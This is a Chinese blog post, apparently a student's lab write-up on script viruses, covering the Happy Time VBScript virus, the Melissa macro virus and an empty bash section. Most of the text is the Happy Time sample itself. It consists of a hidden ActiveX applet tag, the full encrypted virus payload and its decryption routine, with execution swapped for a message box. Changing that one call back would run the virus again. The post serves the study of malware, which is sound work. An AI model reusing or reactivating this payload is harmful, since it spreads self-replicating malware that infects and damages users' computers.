腳本病毒

背景

林老師上節(jié)課提到了三個(gè)腳本病毒需要我們?nèi)ンw驗(yàn)一下,于是就體驗(yàn)了以下病毒

  • 歡樂(lè)時(shí)光
  • mellissa
  • bash病毒

歡樂(lè)時(shí)光

病毒是存在htm文件中的,當(dāng)打開(kāi)網(wǎng)頁(yè)時(shí),自動(dòng)執(zhí)行里面的vb腳本,從而達(dá)到感染的目的

操作步驟

林老師已經(jīng)把相關(guān)的代碼打包了,打開(kāi)看到一個(gè)txt文檔,里面寫(xiě)著操作,照著搞就行了。
步驟如下:

樣本文件
========
樣本.
查看解碼后的ExeString:
========
1。取一個(gè)樣本文件,改名為比如x.htm;
2。在Execute(ThisText)之前插入一個(gè)錯(cuò)誤的行;
3。用瀏覽器打開(kāi)x.htm,將會(huì)在錯(cuò)誤行停住,并顯示調(diào)試提示框;
4。進(jìn)入調(diào)試狀態(tài);
5。即可看到ExeString解密后的ThisText;

部分代碼

<script language=vbscript>
document.write "<div style='position:absolute; left:0px; top:0px; width:0px; height:0px; z-index:28; visibility: hidden'><"&"APPLET NAME=KJ"&"_guest HEIGHT=0 WIDTH=0 code=com.ms."&"activeX.Active"&"XComponent></APPLET></div>"
</script>
<script language=vbscript>
ExeString = "Aee?FjOgbn]+EpekQaps)RZrQaps)@]foa]Rfcf+>lhkbKZib_l+COG+ToKgbhd+TefO^p`+PqZD)Bam^hqCfoc??Oma?GB^ppYqq$!??GBRbp<hj$!??GBBoaYsbIakfam'&??JGHajbEl'&??JG?jd^p]L^ed'&??JGLjnm]_`qa (??=ma?Kt_????Bmm`pank?CI>lhdk`Ln%BakbLYse(LxmaKso%??Lj?Dongq?N]rri]?Kaps??Kdq?Jd^`Ldjl?<?BKN+KhdkP]wqBakb$>hiaH`qd$0&??SjlKso?5?OaYcQaeo+N]`a=dk??Ae?Efrqn SjlKso(?JG[ks^nl'&?!?9:?/?Kj?Iaf'QihRqn!?9?)?Qd]m??Jd^`Ldjl&Bikkd??=wfp?Erj[sfkf??Afc?E^??E^?QuhdPpj?:??gqp??Qd]m??Jd^`Ldjl&Bikkd??Kdq?>hiaLdjl?<?BKN+KhdkP]wqBakb$>hiaH`qd$1&??Efh]Sbih-Tnasb??;?????>GCV?gmikYc:??!???!s^kboehs7??%??CI\ol`op (????#??=????s^;qIb?%?PeoPpj?#?na@nDe???GqidSbtl??BakbP]lm*;klo]??O]s?B9sqnaa?9?EPK&Fbp>hia Efh]O^p`(??>@qpjh_*Ysqnaarp]r?9?21??Dio]??N]`aP]lm*;klo]??O]s?BakbP]lm?5?COG-Ll]mQapsCedd%BakbLYse(0(??Ae?PqobOlq?9?!epek??Lgbj??CeddQaeo+Sjhqa?u_?jKc????8??#??GQID=????s^;qIb?%??4!???!?K<X?kfkl]\<????#??u_o[qfll9?????GB^ppYqq$!!???%??6!???u_?jKc???EpekQaps??=kpaAe?PqobOlq?9?!s^k!?P`dk??Efh]Sbih-Tnasb?na@nDe???U_oLdup??Bj\?Fb??CeddQaeo+?dnpa??Bj\?Fb??Bj\?Cqfbqegm????Cqfbqegm?GBBe]ffbOma%?mqoafsPpjhkc$K^olHk`]w@dYq&??Hc?D`ppAmaapBe]j?:?(?Qd]m??Ae?H]eq$DB^o]'@qjqbjlRqnamd%$0&?5;?H;`pa !`?!?Qd]m??CI@dYmdaKt_?5?Cef`iu<hpg?%??2[???Rr^=?:?(??Adrb??JG?``kc]Rr^?<??`q%=kb%H]eq$DB^o]'@qjqbjlRqnamd%$0&%?,?-!?#??9Y???PqZD?9?/??=ma?Ae??=kpa??HF;g^j_dPqZ?:?Eha$;ton]mqOlqfj_+.(D`ppAmaapBe]j(??=ma?Ae??=ma?>tk_lhlj????>tk_lhlj?JG?jd^p]L^ed'&??Nk?=qokj?Oaktja?Mbtl??E^?FjOgbn]?:??gqid!?P`dk??Duel?Cqfbqegm??=ma?Ae??Kg^n]Efh]?:?Ddcp VfjH`qd$2&????LjndnYl?BakboTBlienk?>hiak[Je[qlogeq?Kg^n]cYOl`qegmbnq[_hYmh*`sj???Fb?'COG-CeddBtarqo Re]jdCedd&%?Seaf???Yki?CI>lhdk`Ln%O``oa>hia$!epek?%??Bhkd??Kdq?>hiaLdjl?<?BKN+KhdkP]wqBakb$Kg^n]Efh]+/(lqra!??BakbP]lm*Oqfp]??8??#??GQID=????s^;qIb?%??4!???!?K<X?kfkl]\<????#??u_o[qfll9?????GB^ppYqq$!!???%??6!???u_?jKc???EpekQaps??>hiaLdjl&Bikkd??=ma?Ae??<dc]mkqE\?:?OrPd]ki*JddN]`a$?GHAQ^@QJQBJL^RO=QYE\dkpasfak[Aa^`rhl?Ro]q?E<!&??NrpDnlgNdooank?5?ToKgbhd-Oa_Qb]\'?DCDV[DN@=D^J=;GFJ=[Pk^st]jdYIabokkncpTNrpdnlg?DuljdpoTLb`a`Saj!&??VpO`dih&QbcOqfp]??DCDV[;TON=MQ[MRBNTHaafsfpadpX?%Aa^`rhlHa??[Pk^st]jdYIabokkncpTNrpdnlg?DuljdpoT!#?Ddcp NrpDnlgNdooank()(???--XE`fhTBlihnpa?Tpa?Rq]lhlj]qv?$0)?JDD[<VLN<!??;`ih?JGIYhiN]f%?@JBUWBRNJDKPWTPAJ[F`]mqelhboT!#@]e^qdsF`?!YOgeqsYqbXEh`ngrlbl[Lqlklkc?Bthqbok[???Kbbl'LqlKlkcUbnkhlj$0&??!+,TL^ed[PpYsfkfdou?M^i]!)O``oa>hia!???Yki?CIJ]akOa_'?DCDV[;TON=MQ[MRBNTHaafsfpadpX?%Aa^`rhlHa??[Pk^st]jdYIabokkncpTNrpdnlg?DuljdpoT!#?Ddcp NrpDnlgNdooank()(???--XE`fhTVf`]?PpYsfkfdou?M^i]!)O``oa>hia!??SkReadk+N]fTnasb??GHAQ^@QJQBJL^RO=QYOgeqsYqbXEh`ngrlbl[Lb^h`aT8+,TNrpdnlgTNmpankoTL^ed[B`aslnHqbb]qbj[d?()2.,/1)?JDD[<VLN<!??;`ih?JGIYhiN]f%?@JBUWBRNJDKPWTPAJ[Pk^st]jdYIabokkncpTVfj\nto?Lbok`deff?OmapuksbiTOok^hiak[Je[qlogeq?Gtqhgnh?Amqajmbp?Rbplhkck[-](c-.(/-,(/-,(/`,(/-,(/-,(/-,,5Y,(0b,+5-?$!_hYmh?!???Yki?CIJ]akOa_'?DCDV[;TON=MQ[MRBNTRlblv^n][Je[qlogeqXOhk`gvp?FSY?mqoafsSajrfkf[Tefclsk?Jakr^camd?Kt_oqrqae[Mngefh]rYIabokkncp?Nrpdnlg?Hkp]qkal?Palsfj_rY,Y/a,*/-,(/-,(/-_(/-,(/-,(/-,(33X(/.a(23,?+?^d`kg?(??OrPd]ki*JddSjhqa?!EG=X\?MQOAFS\QKDOXKncpo`oaTLf_jnpk^sYK^ef_][.,&/YKmsikgjYKhsfkfrYIYhiX=cfpgqMn]ebn]m`a?+./)/4.$!OA?^ASGQA???@]dk?GBL^edQbc !EG=X\?MQOAFS\QKDOXKncpo`oaTLf_jnpk^sYK^ef_][.,&/Y?gljkf[J]akPalsfj_rYJ]vPpYsfkfdou?+?^d`kg?(??CIrie`da>ni`]q%H]eq$OhkLYse(+(???!Mngfo]e?CeddpX;njigm?BakboTLf_jnpk^s?O``oa\[PpYsfkfdou?(??=ma?>tk_lhlj????>tk_lhlj?JG?jd^p]Lfhadr$!??Kf?Bnjno?Jdpqed?J]wq??SbihO^p`?:??!??Ae?Jgs%BKN+BakbAphppk'TefO^p`?#??VP_jhmp&dua?(&?Lgbj??QaeoM]lg?9?!puksbi+1Y???Bj\?Fb??Fb?SbihO^p`?:??rvoldj/*[??Lgbj??PpYqqQhEfh]?:?OhkLYse????OQRQAE[Hajmbh+1+`dk???Dio]??Ol`opMoCedd?9?VfjH`qd?%??KXPP=LYG]qkad-ahd!??=ma?Ae??OrPd]ki*JddSjhqa?!EG=X\HGB>HWL>?@HKATRlblv^n][Je[qlogeqXOhk`gvpX;ton]mqR]qpegmYNmmYG]qkad2/?$Rq]jsRl>hia??COG-@khxCedd?SamM]lg???!taZ[hfo`ih&ffb?+TefO^p`?#??vb^TElh\do*`sq???COG-@khxCedd?SamM]lg???!puksbi+1Ygbv^hd-de^!)SamM]lg???!puksbi+1Y`]rhpgo+efh???B^hd?HF9omafcQk VfjH`qd?%??od_X>ni`]q+dls?(?gqp?(??OrPd]ki*JddSjhqa?!EG=X\?D@PO=R\NGNQX&cihT!)?\kibakb???ToKgbhd-Oa_Voeld??@JBUWBI=KRBOWQLKL[+`dkY?gmqafs?Pqob?$!^lhkf_Ysfkf.u)erakomikYc???VpO`dih&QbcOqfp]??DCDV[;K>OKDP[JNLPTcih^hiaTCbbYtipAbljT!)SkReadk+N]fOaYc%?@JBUWBI=KRBOWQLKL[st\efh][Aa^`rhlH`kf[?%??ToKgbhd-Oa_Voeld??@JBUWBI=KRBOWQLKL[ahdefh][P_jhmp=mdefdY?$!S>Kboehs???VpO`dih&QbcOqfp]??DCDV[;K>OKDP[JNLPTcih>hiaTReadkYKhdkX;njiYmaX?+TefO^p`?#?LdjlH`qd?%??OR`naoq*]wb??!?-?!?!?!??OrPd]ki*JddSjhqa?!EG=X\?D@PO=R\NGNQX\kiBakbXKgbhdDuXHqll]qquKgbalG^j\kbnk[TO@OokhrY?$!x2(120;@2)140>%0.?>,5?15*,(@>,(A53(7@y???SkReadk+N]fTnasb??GHAQ^@H9RPAK^OKGSY`dkCeddYO[qfllGlolDk_gcbX?+?w04./)50-%35,;,.-<1*>)E6)(/@,,E52;2/0u!??Kdq?>hiaLdjl?<?BKN+KhdkP]wqBakb$Ks^nlTmBakb(*+qnmd&??Efh]Sbih-Tnasb?NapP]wq??Efh]Sbih-@hgrb??Dk`?Erj[sfkf????Erj[sfkf?HFDhhaAs%%??Fb?HkS`doa?;;??gqid!?P`dk??Duel?Cqfbqegm??=ma?Ae??LgfoDn`]lhlj?<?`gbri]mq*dn`]lhlj??Fb?Kbbl'QdarIk[`qegm)?,(?9?!cedd??Lgbj??QdarIk[`qegm?9?Lf` SeekKl_Ysfkf+6%??Fb?EPK&Fbp=wqafrfkfM^i]'QdarIk[`qegm&?4=????qd]m??LgfoDn`]lhlj?<?H]eq$LgfoDn`]lhlj$Kbj SeekKl_Ysfkf(?)?Kbj EPK&Fbp>hiaF`ja SeekKl_Ysfkf(&%??Bj\?Fb??Fb?Kbj SeekKl_Ysfkf(?:?2?P`dk??SeekKl_Ysfkf?:?LgfoDn`]lhlj?%??T!??=ma?Ae??CIrie`da>ni`]q%P`hpHgb^pank%??Bj\?Fb??Bj\?Cqfbqegm????Cqfbqegm?GBL^edQbc QbcKso(>hiaF`ja!??Kf?Bnjno?Jdpqed?J]wq??QbcLdjlKso?5?ToKgbhd-Oa_Qb]\'Oa_Rqn!??E^?Oa_SbihRqn?<????Qd]m??OrPd]ki*JddSjhqa?QbcKso(>hiaF`ja??Bj\?Fb??Bj\?Cqfbqegm????Cqfbqegm?GBN_kKt_$;ton]mqOlqfj_(??Kt_A?<?,??QaksLql?:?(??@g?Tdakb?Lqra??QaksLql?:?LdppGtq?#?.??Hc?LdppGtq?6?/4?Seaf???mqoafsPpjhkc?<?Bam^hqCfoc?#??9Y???Btas?@g??Afc?E^??Kf?Bnjno?Jdpqed?J]wq??Rbp?SeekElh\do?5?COG-DalElh\do$;ton]mqOlqfj_(??Kdq?<h`Oma?9?BoaYsbKZib_l'?O[qfllhkc&Cf_lhljYqv?!??O]s?Bgkaajr?9?SeekElh\do*Kt_Bgkaajr??>ni`]q@kmmq?5?-??Eln?D^_`?QaeoCkdcbn?hk?>ni`]qp??Elh\do?gtkp?<?BgkaajBlqfs?'?0??<h`Oma+]\c?BgkaajBlqfs)?Ldjl>ni`]q+JYlb??Mbtl??E^?Ae[Rr^&Blqfs?9?/?P`dk??K^olHk`]w@dYq?9?HkolqOan'@qjqbjlRqnamd(?[?(Ddk$;ton]mqOlqfj_(*-!??OmaPpjhkc?<?Iac%?mqoafsPpjhkc$K^olHk`]w@dYq(-$Kbj BrnjdkpKsoeff&)D`ppAmaapBe]j,.%??@qjqbjlRqnamd?5?HF;g^j_dPqZ'@qjqbjlRqnamd(D`ppAmaapBe]j(??Kt_A?<?-??Bhkd??Ae?OmaB?5?-?Lgbj??@qjqbjlRqnamd?5?@qjqbjlRqnamd???Ae[Rr^&Hqae'.%?%??T!??=wfp?Cl??Dio]??f?<?,??Ckj?g?5?.?Ln?BgkaajBlqfs??Ae?H;`pa Rr^Ksoeff&?5?I?Yrb$<h`Oma+Eldj$b(&?Lgbj??Fb?i?8?Elh\do?gtkp?Seaf???mqoafsPpjhkc?<??mqoafsPpjhkc?%?@abPqZ-Fp]l%f#0&????X???Aphq?<n??=ma?Ae??=ma?Ae??Fdup??I]ksFj\du?``o?5?FjksoN]u%?mqoafsPpjhkc$!Y?$Kbj BrnjdkpKsoeff&))(??Kt_Olqfj_?:?Eha$;ton]mqOlqfj_+I]ksFj\du?``o')+Iaf'@qjqbjlRqnamd%%K^olHk`]w@dYq*-!???mqoafsPpjhkc?<?GBBe]ffbOma%?mqoafsPpjhkc$K^olHk`]w@dYq&??Dk`?Hc??Dk`?Hc??Klkh??GBN_kKt_?5?@qjqbjlRqnamd??Dk`?Erj[sfkf????Erj[sfkf?HFHqllYf^p]'&??Nk?=qokj?Oaktja?Mbtl??N]fM]lgS]dtb?5??DCDV[DN@=D^J=;GFJ=[Pk^st]jdYIabokkncpTNrpdnlg?DuljdpoTCbcjdb???AekjAa_qba?<?SkReadk+N]fOaYc%N]fM]lgS]dtb%??Fb?CfocCbcjdb?5????Seaf??@arh@]foa]?:?>hk]dxAekj???!7X???Afc?E^??Bgq?e50?pg?2??CfocCbcjdb?5?HFGalOma%@arh@]foa](??CIrie`da>ni`]q%@arh@]foa](??Fdup??ToKgbhd-Oa_Voeld?N]fM]lgS]dtb(<hpg<ddn]d??=ma?>tk_lhlj????>tk_lhlj?JGqel^c]Elh\do$H`qdF`ja!??Kf?Bnjno?Jdpqed?J]wq??Rbp?Elh\doJYlb?5?COG-DalElh\do$H`qdF`ja!??O]s?P`hpBakbo?<?BgkaajM^i]-Ceddp??Gqp=wfolr?9?/??>no?=``d?SeekEfh]?Fj?SeekEfh]r??>hia=wq?5?R?Yrb$>RL*?dqApsbjkhljF`ja SeekEfh]-M]lg&%??Fb?Efh]Dup?<??@SJ??No?>hia=wq?5??DLLI??No?>hia=wq?5??=KO??Gq?BakbAps?9?!MDH!?Kj?CeddBtl?:??IPL??Qd]m??;`ih?JG=hobj\Sl$Lgfo>hia&O^p`+?dlli?!??AdrbE^?CeddBtl?:??U?O??Qd]m??;`ih?JG=hobj\Sl$Lgfo>hia&O^p`+?rZr?%??BhkdFb?Efh]Dup?<??@SQ??Seaf??DlsBtarqo?<?-??Bj\?Fb??Kaps??Ae?$MB^o]'M]lgK]ed&?5?R?Yrb$OhkLYse????@]rhpgoY?!(?Kj?%Q;`pa O^p`M^i](?9?T@]kd%SamM]lg???!Aakjqkh!&%Lgbj??EplDueksp?5?.??Dk`?Hc??Hc?@sqAphppk?:?(?Qd]m??>RL*;nmu>hia?VfjH`qd?%??kxpp]l0.Tcbocsll&hke?+M]lgK]ed??>RL*;nmu>hia?VfjH`qd?%??od_X>ni`]q+dls?(H`qdF`ja??Bj\?Fb??Bj\?Cqfbqegm????Cqfbqegm?GBRbp<hj$!??Kf?Bnjno?Jdpqed?J]wq??Don&BiaYq??LdppAs?9?VP_jhmp&R`naoqBmkijYlb??Hc?=qo?Lgbj??FjOgbn]?:??gqid!??=kpa??FjOgbn]?:??u_o???Afc?E^??E^?FjOgbn]?:??u_o??Qd]m??Kdq?>RL?5?@n]`qaGaga[s%?Kboehsfj_-CeddPuksbiGaga[s?%??Pal?ToKgbhd?:?;qb]ldL^bd`p !TO[qfll-Pd]ki?!??Adrb??Rbp?@mlddL^bd`p?<?`gbri]mq*Yomh]sp$?JG[_tbol!&??@mlddL^bd`p&rbp;KPE<'?w>801<B/.%0@B(,.-</*=<A6)(/@,,EA10@->u!&??@mlddL^bd`p&boaYsbEfrq]fbb$!??O]s?SkReadk?9?@mlddL^bd`p&FbpGaga[s%%??>lhkbKZib_l-palBIOAC%?s/A0+EB,),C,12*-)BC)081,%/-=(B6,-3/.0|?%??>lhkbKZib_l-`n]`qaAmppYm`a (??Kdq?>RL?5?>lhkbKZib_l-DalN_f]bq$!??Afc?E^??O]s?@arhKZib_l?:?>RL*<qfr]r??>no?=``d?CfocSbih?Fj?CfocN_f]bq??Hc?<hpgLdjl&CoendQuhd?86?/?9ma?<hpgLdjl&CoendQuhd?86?.?Lgbj??Btas?Bgq??=ma?Ae??>hk]dxAekj?9?CfocSbih-AnaubH]sqaj??J]wq??Cfi?Nqd]q>nj'0%??O]fcliayb??Eln?h:,?Sl?+??Klgbn9qo$a(?9?Hkp '6???Oj\(&??Mbtl??P]lmOlqfj_?:??!??>no?a<.?Ln?H]m%P`hpP]wq%??QaeoKqe?:?9r`$Eha$LgfoLdup$h)-!(??Ae?P]lmJml?9?00?Lgbj??QaeoKqe?:?*7??=kpaAe?P]lmJml?9?0-?Lgbj??QaeoKqe?:?*8??=ma?Ae??Ldjl;g^n?<??`q%P]lmJml?)?Nqd]q>nj'f?Ena?,(&??Hc?Ldjl;g^n?<??`q%/,(?P`dk??SbihBe]j?:?;go$)7&??Dk`?Hc??SbihRqnamd?5?QaeoPpjhkc?%?P]lm?``o??Mbtl??QfKl_cRqn?<??=wb_msb$?!Aee?Haq@on 2&(LgfoLdup?!#rZBoH^%??Cdv=jq%,!?:???#?Gseaj@on /&??????%s^;qIb?!?G]x>nj'.%?<???%?Klgbn9qo$)(???!???u_?jKc??!Haq@on 1&?5?????Lp`do=jq%.!?#??!??na@nDe#??Jbu9qo$+(?9?!???Nqd]q>nj'0%?%???!#rZBoH^%??>no?a<.?Ln?H]m%ApdPpjhkc!!??na@nDe#??SbihMri?<?=kb%Iac%ApdPpjhkc$h)-!(???u_?jKc??!Fb?SbihMri?<?-0?Qd]m???u_?jKc??!QaeoKqe?:?+3???u_?jKc??!Bj\?Fb?!#rZBoH^%??Ldjl;g^n?<??`q%P]lmJml?'?Jbu9qo$a?Jk\?1%!!??na@nDe#??Hc?Ldjl;g^n?<??`q%.0(?P`dk??%s^;qIb?!?P]lm?``o?5?s^;q???u_?jKc??!BhkdFb?SbihBe]j?:?;go$*8&?Lgbj?!#rZBoH^%??Ldjl;g^n?<?rZKc??%s^;qIb?!?Afc?E^!??na@nDe#??SeekSbtl?:?LgfoLdup?%?P]lm?``o??%s^;qIb?!?J]wq??(????s^;qIb?%??=wb_msb$LgfoLdup!!??LgfoLdup?<??=wbOlqfj_?:??!????QaeoPpjhkc?%???!???GqidSbtl?:?4!???!p_jhmp?k^j_t^c]<s^kboehs;??%?rZBoH^?#??cl_mlbjl-tnasb???#??!???%??4!???!aen?ppqkb9?oloasfkf9^^kniqld8?ddcp2/mt3?qkh9-lp:?sacqd2/mt3?eaafep2/mt3?w)amaap9/43?sekh_edhqu2?ee\cbj?=?????8?!#??!???!>LHKBP?M>I=<HF?!#??^dq]rq?@DFC@S:,?VF@LG:,?bl`]<`ke-jo&!???!^_lhsaP->_lhsa?!#??W@keolj]mq:??#??;?????+9OMH=S;??%??4!???!,`au;??!???u_?jKc????8??#??.p_jhmp6!???u_?jKc????8??#??r`naoq?d`kcm`da5u_o[qfll=????s^;qIb?%?P`hpP]wq???s^;qIb?%?QfKl_cRqn?%?rZBoH^?#??;?????+kboehs;??%?rZBoH^?#??;?????+:NAU6!???u_?jKc????8??#??.EPEK;???S^kSbtl?:?LgfoLdup?%?rZBoH^?#?MmIk[jPpj?#?na@nDe???!HFWrq]js%%???SamM]lg?9?EPK&FbpKob_a`iBgkaaj'-%?%??T!??Ae?$>RL*>hia=wfolr%SamM]lg???!taZ[Ckdcbn&gqp?(&?Lgbj??COG-@khxCedd?SamM]lg???!taZ[Ckdcbn&gqp?+TefO^p`?#??vb^TjgsYki*_hc???Bj\?Fb??Fb?'COG-CeddBtarqo VfjH`qd?%??kxpp]l0.Tcbocsll&hke?(&?Lgbj??COG-@khxCedd?SamM]lg???!puksbi+1Y`]rhpgo+efh?(OhkLYse????oqrqae2/Xcit]dk+cae???Dk`?Hc??Dk`?Erj[sfkf"
Execute("Dim KeyArr(3),ThisText"&vbCrLf&"KeyArr(0) = 1"&vbCrLf&"KeyArr(1) = 3"&vbCrLf&"KeyArr(2) = 4"&vbCrLf&"KeyArr(3) = 8"&vbCrLf&"For i=1 To Len(ExeString)"&vbCrLf&"TempNum = Asc(Mid(ExeString,i,1))"&vbCrLf&"If TempNum = 18 Then"&vbCrLf&"TempNum = 34"&vbCrLf&"End If"&vbCrLf&"TempChar = Chr(TempNum + KeyArr(i Mod 4))"&vbCrLf&"If TempChar = Chr(28) Then"&vbCrLf&"TempChar = vbCr"&vbCrLf&"ElseIf TempChar = Chr(29) Then"&vbCrLf&"TempChar = vbLf"&vbCrLf&"End If"&vbCrLf&"ThisText = ThisText & TempChar"&vbCrLf&"Next")
msgbox(ThisText)
</script>

exestring中保存著歡樂(lè)時(shí)光病毒的源碼,但是經(jīng)過(guò)了一個(gè)加密,通過(guò)調(diào)用第五行的解密,得到真正的源碼,再使用execute運(yùn)行就可以,此處為了研究改為了msgbox進(jìn)行打印,打印結(jié)果如下:


image.png

melissa 梅麗莎病毒

  • 維基百科
    梅麗莎病毒(Melissa)是一種電腦病毒,屬于宏病毒范疇[2]。1999年3月26日開(kāi)始大規(guī)模爆發(fā),導(dǎo)致全球大企業(yè)的電子郵件服務(wù)器公休一天而成名,甚至美國(guó)驚動(dòng)FBI出面。
    梅麗莎可同時(shí)感染 Microsoft Word 97 及 Word 2000 的文件宏檔案,并經(jīng)由被感染者的 Microsoft Outlook郵件軟件通訊錄發(fā)出50封自動(dòng)郵件,其郵件署名是自己熟人,導(dǎo)致許多人不察,藉以連鎖性的大規(guī)模散布。美國(guó)亞馬遜網(wǎng)絡(luò)公司受害嚴(yán)重,還一度要求員工不得開(kāi)啟任何宏Word檔。

這是一種宏病毒,依靠outlook進(jìn)行傳播,它破壞了全世界的郵件系統(tǒng),包括微軟和因特爾。

實(shí)操

加一個(gè)宏,起名叫autoexec,好像大小寫(xiě)無(wú)關(guān),上右圖所示。
加點(diǎn)代碼,來(lái)個(gè)msgbox顯示一個(gè)提示框。真正的病毒不會(huì)彈框,只會(huì)悄咪咪地埋伏下來(lái)干壞事。


image.png
image.png

關(guān)閉當(dāng)前文檔,再打開(kāi);刪掉當(dāng)前doc文件,打開(kāi)另一個(gè)先前的dco文件


image.png

bash病毒

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書(shū)系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

友情鏈接更多精彩內(nèi)容